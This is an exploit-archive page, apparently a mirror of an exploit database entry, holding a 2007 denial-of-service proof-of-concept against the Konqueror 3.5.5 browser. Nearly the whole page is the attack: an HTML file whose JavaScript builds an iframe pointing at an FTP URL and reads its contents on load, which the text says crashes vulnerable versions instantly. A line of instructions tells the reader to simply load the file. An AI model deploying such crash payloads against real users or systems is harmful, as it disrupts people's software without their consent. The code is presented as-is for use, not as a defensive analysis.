[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Konqueror 3.5.5 (JavaScript Read of FTP Iframe) DoS Exploit
# Published : 2007-03-05
# Author : mark
# Previous Title : MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
# Next Title : PHP wddx_deserialize() String Append Crash Exploit
<html>
<body>
Demo of how to make Konqueror 3.5.5 crash by mark@bindshell.net.<p>
Simply load this file in Konqueror. Vulnerable versions should segfault instantly with a null pointer exception.<p>
<p>
<script>
read_iframe = function(iframe_name) {
var banner = document.getElementById(iframe_name).contentWindow.document.body.innerHTML;
alert(banner);
}
var iframe = document.createElement("IFRAME");
iframe.setAttribute("src", 'ftp://localhost/anything');
iframe.setAttribute("name", 'myiframe');
iframe.setAttribute("id", 'myiframe');
iframe.setAttribute("onload", 'read_iframe("myiframe")');
iframe.style.width = "100px";
iframe.style.height = "100px";
document.body.appendChild(iframe);
</script>
</body>
</html>
# www.Syue.com [2007-03-05]